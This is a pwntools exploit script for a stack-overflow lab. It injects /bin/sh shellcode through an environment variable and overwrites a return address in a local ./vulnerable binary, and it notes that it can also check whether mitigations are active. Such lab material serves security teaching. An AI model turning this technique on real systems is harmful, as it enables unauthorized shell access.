#!/usr/bin/env python
"""Stack-overflow lab script for the local ./vulnerable binary (pwntools).

Flow: assemble a /bin/sh shellcode, start the target with that shellcode in
the SHELLCODE environment variable, then send one line made of filler bytes
followed by a packed address.

NOTE(review): the fixed address below presumably points at the SHELLCODE
string on the child's stack. That only holds with ASLR disabled and an
identical environment layout, and the approach also presumes an executable
stack and no stack canary -- confirm against the lab's build flags. On a
build with ASLR, NX and stack protector enabled this script is expected to
fail, so it can double as a check that those mitigations are active.
"""
from pwn import *

# Lets pwntools derive architecture and word size from the target ELF;
# asm() and pack() below depend on this context.
context.binary = "./vulnerable"

# Inputs: the shellcode, the return address offset, and the target address.
ret_offset = 16            # filler bytes sent ahead of the packed address
target = 0x7fffffffeba4    # hard-coded for this lab setup (see module note)
shellcode = asm(shellcraft.sh())

# Start the target with the shellcode carried in an environment variable.
child_env = {'SHELLCODE': shellcode}
io = process('./vulnerable', env=child_env)

# Payload layout: ret_offset filler bytes, then the target address packed
# at the context's word size.
payload = b"".join([b"A" * ret_offset, pack(target)])

# Deliver the payload as a single line, then attach the terminal.
io.sendline(payload)
io.interactive()